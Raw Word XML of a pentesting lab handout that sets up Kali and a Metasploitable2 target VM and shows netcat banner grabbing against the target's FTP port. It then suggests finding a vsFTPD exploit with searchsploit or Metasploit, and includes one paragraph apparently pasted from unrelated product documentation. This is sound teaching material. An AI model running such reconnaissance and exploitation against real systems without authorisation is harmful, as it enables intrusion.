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F9EB2" w14:textId="564D0C7C" w:rsidR="00A600A7" w:rsidRDefault="00A600A7" w:rsidP="00A600A7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40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A600A7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab - Pentesting with Netcat </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E4DCA4" w14:textId="35F3D4D8" w:rsidR="00A600A7" w:rsidRDefault="00A600A7" w:rsidP="00A600A7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Cs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Overview –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B48D72" w14:textId="23268AE1" w:rsidR="00A600A7" w:rsidRDefault="00A600A7" w:rsidP="00A600A7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A600A7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">In this lab, we will look at some of the features available with Netcat. </w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:t>The m</w:t>
      </w:r>
      <w:r>
        <w:t>ost common use for Netcat is setting up reverse and bind shells, piping</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>redirecting network traffic, port listening, debugging programs and scripts</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and banner grabbing. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA99B71" w14:textId="08BDB1CF" w:rsidR="00A600A7" w:rsidRDefault="00A600A7" w:rsidP="00A600A7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A600A7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705B0FF0" w14:textId="75B0033C" w:rsidR="00A600A7" w:rsidRPr="00A600A7" w:rsidRDefault="00A600A7" w:rsidP="00A600A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cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A600A7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>One installation of VirtualBox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (latest version, with extension pack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191E9768" w14:textId="0AF2D378" w:rsidR="00A600A7" w:rsidRPr="00A600A7" w:rsidRDefault="00A600A7" w:rsidP="00A600A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cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A600A7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>One virtual install of Kali Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (updated and upgraded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EF6954" w14:textId="68BB3504" w:rsidR="00A600A7" w:rsidRPr="00A600A7" w:rsidRDefault="00A600A7" w:rsidP="00A600A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cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A600A7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>One virtual install of Met</w:t>
      </w:r>
      <w:r w:rsidR="002D762F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00A600A7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>sploitable2</w:t>
      </w:r>
      <w:r w:rsidR="002D762F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FC46EC" w14:textId="742C25F3" w:rsidR="00A600A7" w:rsidRDefault="00A600A7" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>All VirtualBox network adapters should be set to NAT network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB8C526" w14:textId="06095283" w:rsidR="00A600A7" w:rsidRDefault="00A600A7" w:rsidP="00A600A7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Cs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A600A7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Begin the lab!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF115B6" w14:textId="5866B1B1" w:rsidR="002D762F" w:rsidRDefault="002D762F" w:rsidP="00A600A7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Log</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">on to both your Kali and Metasploitable2 machines. The username and password for Metasploitable2 is </w:t>
      </w:r>
      <w:r w:rsidRPr="002D762F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAF1973" w14:textId="0E7277B2" w:rsidR="00A600A7" w:rsidRDefault="002D762F" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D762F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">At </w:t>
      </w:r>
      <w:r w:rsidR="0015467A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">terminal prompt for </w:t>
      </w:r>
      <w:r w:rsidRPr="002D762F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Metasploitable2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">, type </w:t>
      </w:r>
      <w:r w:rsidRPr="002D762F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">. Take note of the IP address assigned to your working network adapter. </w:t>
      </w:r>
      <w:r w:rsidRPr="002D762F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>This is my IP address</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="002D762F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> yours will differ!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C6A3F1" w14:textId="7F15F2D0" w:rsidR="002D762F" w:rsidRDefault="002D762F" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BBEFCBE" wp14:editId="15BBA54E">
            <wp:extent cx="3670479" cy="1026636"/>
            <wp:effectExtent l="0" t="0" r="635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9934" cy="1082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10CDA" w14:textId="3DCB300C" w:rsidR="0015467A" w:rsidRDefault="0015467A" w:rsidP="00A600A7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Cs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015467A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Banner grabbing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FF130D" w14:textId="64C2D216" w:rsidR="0015467A" w:rsidRDefault="0015467A" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015467A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>The following command is used the grab a service banner (make a raw connection to a service):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210277C7" w14:textId="6108F54E" w:rsidR="0015467A" w:rsidRPr="008568FC" w:rsidRDefault="0015467A" w:rsidP="00A600A7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008568FC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008568FC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> [target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008568FC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008568FC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> address][port]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6870AED3" w14:textId="5E02FC2A" w:rsidR="008568FC" w:rsidRDefault="008568FC" w:rsidP="008568F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Cs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0090617C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>FTP Banner Grabbing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3390BE96" w14:textId="00342718" w:rsidR="008568FC" w:rsidRPr="008568FC" w:rsidRDefault="008568FC" w:rsidP="008568F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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">To see what FTP service is running on our Metasploitable2 target, from your Kali machine, open a terminal and at the prompt type -  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015467A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015467A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.11 21 </w:t>
      </w:r>
      <w:r w:rsidRPr="0015467A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Substitute my target IP address for yours)</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>The banner tells us we have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015467A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>vsFTPD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015467A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> service running on port 21</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we also know the version number. I can now use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>etasploit</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> or some other exploit database</w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit the will give me access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797F92B9" w14:textId="4D5882D2" w:rsidR="009E5DBD" w:rsidRPr="008568FC" w:rsidRDefault="008568FC" w:rsidP="00A600A7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1878B8C4" wp14:editId="6A54EFB2">
            <wp:extent cx="1809482" cy="619590"/>
            <wp:effectExtent l="0" t="0" r="63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524" cy="63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0ABC9" w14:textId="62D7525D" w:rsidR="009E5DBD" w:rsidRPr="009E5DBD" w:rsidRDefault="009E5DBD" w:rsidP="00A600A7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Cs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E5DBD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>RAW Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279C4CAB" w14:textId="38923648" w:rsidR="0015467A" w:rsidRDefault="0015467A" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r w:rsidR="009E5DBD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>now</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> have a raw FTP connection established</w:t>
      </w:r>
      <w:r w:rsidR="009E5DBD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009E5DBD" w:rsidRPr="009E5DBD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">Raw (TCP/IP) is an insecure communication protocol. When using this connection protocol with the provisioning system, anyone with network access to a server </w:t>
      </w:r>
      <w:r w:rsidR="00126CA6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidR="009E5DBD" w:rsidRPr="009E5DBD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> an N1 Service Provisioning System 5.1 application installed on it can connect to the provisioning system and issue commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603AE101" w14:textId="18332D04" w:rsidR="004458C1" w:rsidRDefault="004458C1" w:rsidP="00A600A7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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
